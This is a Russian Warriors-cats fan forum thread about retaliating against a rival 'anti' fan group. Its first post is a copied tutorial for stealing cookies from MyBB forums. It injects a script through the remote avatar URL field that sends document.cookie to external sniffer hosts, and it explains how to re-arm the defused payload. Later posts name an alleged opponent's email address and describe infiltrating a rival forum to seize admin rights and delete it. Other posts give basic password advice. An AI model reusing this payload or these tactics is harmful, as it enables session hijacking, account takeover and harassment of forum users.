Сайт
Регистрация
Вход
Пятница
17.05.2024
09:27
Приветствую Вас Гость | RSS
~Коты-воители~
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Огонек, звезда-цвет  
~Коты-воители~ » Общение » Флудилка » Будем мстить АКВ??? (Отомстим анти КВ!)
Будем мстить АКВ???
ОгонекДата: Вторник, 25.08.2009, 16:30 | Сообщение # 1
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
Я знаю как взломать сайт на майбе!

Уязвимость в этом форуме называется XSS ты наверно уже не раз о ней слышал в разных баг-лентах.
Требования к форуму:
Самое главное в этой уязвимости, то чтоб форум на Mybb поддерживал вставление своих аватарок с удаленных URL тогда мы сможем ввести за место аваторки зловредный код, тем самым просниффаем форум и достаним куки!

Как всегда сначало ищем жертву, т.е. форум на Mybb. С этим проблем не возникнет, теперь регимся и заходим в юзерскую панель, короче нам необходимо свтавить URL якобы на аватору! А на самом деле это будет код которым и прониффаем!
Короче, ставь галочку на "Загрузить аватору с URL" и в поле где нужно ввести URL вставляй:

*"><*script>img=new Image();img.src="http://antichat.org/s/твойЛогин.gif?"+document.cookie;<*/script><*hr "*

или

*"><*script>img=new Image();img.src="http://s.netsec.ru/твойЛогин.gif?"+document.cookie;<*/script><*hr "*

ВНИМАНИЕ: в приведенных мной примерах стоят лишьние знаки * они были поставлены что бы эти скрипты не сработали на данном сайте! Для использования этих примеров удалите все знаки *

После этого попости немного на форуме и через время иди на свой сниффер и смотри логи, там и будут куки!

Вот и все!




/Life is just a game. The true value of life - enjoy the game until the very end./
 
ОгонекДата: Среда, 26.08.2009, 18:17 | Сообщение # 2
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
Это Я скопировала в нете!

(Это я нашёл под темой в поисковике)
НАРОД, ГОСПОДА АДМИНЫ, ВИДИТЕ НА ФОРУМЕ ЧЕЛА С МЫЛОМ alagara@rambler.ru ИЛИ ЧЕМ-ТО ПОХОЖИМ, ГОНИТЕ В ШЕЮ, ЭТО АНТИ-КВ!!!!

(Это я заглянул на сайт, который коснулись АнтиКВ)
(Писал Анти КВ)
А вот и мы!!! АНТИ КОТЫ!!!!

(Порвать бы автора этой строки)
Я сам конечно не люблю котофф, поетому придется посидеть как анти-кв... Только предупреждаю, я буду материть все и фся на благо нам! *убег*

(Сомнительная... Хотя, я не заходил туда по этому без понятия что имелось в виду)
ну напиши автора пиксельных кв! А то анти-кв припрутся и сайт испортят!

(АнтиКВшник или не АнтиКВшник)
Думаете, я не знаю цену своих анти-КВ выступлений на КВ? smile И кому лично явлюсь антагонистом? smile Арзи, Вас все здесь поняли.

ПОДТВЕРЖДЕНИЯ ТОГО, ЧТО АНТИ КВ ХОДИТ С ЭМАЙЛ alagara
(Это я нашёл в поисковике под темой)
...В связи с тем, что в Интернете взламывают сайты и форумы, посвящённые "Котам-воителям", предупреждаю: пользователь с e-mail: alagara@rambler.ru или alagara@list.ru является анти-КВ.

Если увидите на ролевой пользователя с мэйлом alagara@rambler.ru или чем-то похожим, то сообщите, ибо это Анти-КВ."

Сайт Анти КВ http://anticwrulezzz.0pk.ru/
Сайт Анти-АнтиКВ http://catwarrior.6bb.ru/

Скоро я ещё инфы об этом найду...

(Маленький факт)

Это Glebonus, Анти-КВ и Антикотяра. Поначалу она всех запугивала и грозила взломать все форумы и сайты по КВ. Мы посмеялись.. К февралю их форум был взломан.




/Life is just a game. The true value of life - enjoy the game until the very end./
 
ОгонекДата: Среда, 26.08.2009, 18:23 | Сообщение # 3
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
Вот форум ПРОТИВ АНТИ КВ



/Life is just a game. The true value of life - enjoy the game until the very end./
 
ОгонекДата: Среда, 26.08.2009, 18:37 | Сообщение # 4
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
Всем быть на стороже!!!

Анти-КВ(крайне неприятные личности, гадящие квшникам и взламывающие КВшные форумы) снова активизировались.
Были взломаны форумы "КВ. Закат" и "КВ. Тени Луны".
Прошу админов обезопасить форум и усложнить свои пароли, а так же ежедневно проверять логи.
Если все-таки взломают(надеюсь, что я ошибаюсь), обратитесь в майбб с просьбой восстановить форум, и его откатят на несколько дней назад.
Будьте бдительны.

1. Ставить сложный пароль из 24-25 символов. Употреблять не только латинские буквы в разных регистрах, но и такие: @#$%^&_-.
2. Записать этот пароль в очень надёжное место [не на компьютер, а в специальную тетрадь и т.п.].
3. Сменить свой e-mail на несуществующий, например "fig_vskroesh@igogo.loh" и поставить условие "скрыть адрес и запретить слать сообщения через форум".
Объясняю, зачем нужно скрытие почтового ящика.
Есть функция "забыл пароль". Если злоумышленник из вредности введёт в предложенное поле ваш подставной e-mail, новый пароль придёт на несуществующий адрес, и вы потеряете форум. Правда, он тогда и взломщику не достанется.
4. Никому не давайте свой пароль, в особенности если вы админ. Лучше всего, если у всех админов на вашем форуме будут сложные пароли и скрытые несуществующие адреса.
5. Делайте администраторами или модераторами только проверенных людей, а у модераторов отключите возможность менять e-mail пользователя.




/Life is just a game. The true value of life - enjoy the game until the very end./
 
ЯстребДата: Пятница, 19.03.2010, 20:20 | Сообщение # 5
Ловчий Клана Падающей Воды
Группа: Проверенные
Сообщений: 245
Репутация: 12
Статус: Offline
Что это за бред собачий! Какие ещё анти-Котов-Воителей!

Мир необьятен и полон чудес, дорогие мои кошечки...
Родители:
Братья и сёстры:Пыль.
Друзья(подруги):Огонёк.
Интересы:Текна.
Симпатия:Текна.
Любовь:...
 
ОгонекДата: Суббота, 20.03.2010, 09:04 | Сообщение # 6
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
Ястреб, понимаешь,не все любят Котов-Воителей.Сейчас этот народ называется Анти Коты-Воители(АКВ).Эта группа взламывает сайты КВ.Этих хотят доказать нелюбязнь к Котам-Воителям.



/Life is just a game. The true value of life - enjoy the game until the very end./
 
ЯстребДата: Воскресенье, 21.03.2010, 12:56 | Сообщение # 7
Ловчий Клана Падающей Воды
Группа: Проверенные
Сообщений: 245
Репутация: 12
Статус: Offline
Я имею в-виду то что ты написала! И где этот-самый форум анти-квешников? Я его найду, внедрюсь, стану сначала Модером, потом порошу сделаться Админом и удалю этот сайт! Всмысле сайт АКВ!!! angry angry angry angry angry angry angry angry angry angry angry angry angry

Мир необьятен и полон чудес, дорогие мои кошечки...
Родители:
Братья и сёстры:Пыль.
Друзья(подруги):Огонёк.
Интересы:Текна.
Симпатия:Текна.
Любовь:...
 
ОгонекДата: Воскресенье, 21.03.2010, 19:32 | Сообщение # 8
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
В моём 2-ом сообщении смотри!(внизу!)))))



/Life is just a game. The true value of life - enjoy the game until the very end./
 
ЯстребДата: Понедельник, 22.03.2010, 13:21 | Сообщение # 9
Ловчий Клана Падающей Воды
Группа: Проверенные
Сообщений: 245
Репутация: 12
Статус: Offline
Я там терь Анти-кэвешник! Ник такой. Использовал несколько твоих советов. Пытаюся понравится их Админу... smile

Мир необьятен и полон чудес, дорогие мои кошечки...
Родители:
Братья и сёстры:Пыль.
Друзья(подруги):Огонёк.
Интересы:Текна.
Симпатия:Текна.
Любовь:...
 
ОгонекДата: Понедельник, 22.03.2010, 13:25 | Сообщение # 10
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
Ястреб, спасибо большое что так стараешься! biggrin



/Life is just a game. The true value of life - enjoy the game until the very end./
 
ОгонекДата: Понедельник, 22.03.2010, 13:26 | Сообщение # 11
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
Я Ния



/Life is just a game. The true value of life - enjoy the game until the very end./
 
ТекнаДата: Четверг, 01.07.2010, 12:47 | Сообщение # 12
Воительница Речного племени
Группа: Проверенные
Сообщений: 48
Репутация: 1
Статус: Offline
Анти кв-эшники-УРОДЫ!

Добавлено (01.07.2010, 12:47)
---------------------------------------------

Quote (Огонек)
Вот форум ПРОТИВ АНТИ КВ

Регнулась! Я там-Невидимка


 
ИскрогривкаДата: Суббота, 20.08.2011, 13:35 | Сообщение # 13
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Ненавижу! Уроды!!!!!Я не смогу ничего сделать на их сайте, , ,ноя буду защищать мой сайт! Огонек, ты хорошо в этом разбираешься! Не поможешь? Извини, что обращаюсь, но у меня сайтнедавно создала, а сама мало что умею! Я не хочу чтобы его взломали!
 
ОгонекДата: Пятница, 16.09.2011, 08:54 | Сообщение # 14
Over and Over
Группа: Администраторы
Сообщений: 1717
Репутация: 32
Статус: Offline
Искрогривка, чем могу,тем помогу,конечно.:)



/Life is just a game. The true value of life - enjoy the game until the very end./
 
~Коты-воители~ » Общение » Флудилка » Будем мстить АКВ??? (Отомстим анти КВ!)
  • Страница 1 из 1
  • 1
Поиск:

 
Copyright MyCorp © 2006
Бесплатный хостинг uCoz
Страничка Огнегривки. Коты-Воители, Аватары, Обои, Книги, Иконки, Календарики, Часики, Закладки, Игры, Рисунки, Форум, Ролевая Игра и многое-многое другое. Жми скорее! =) ~Ролевая игра Котов-Воителей~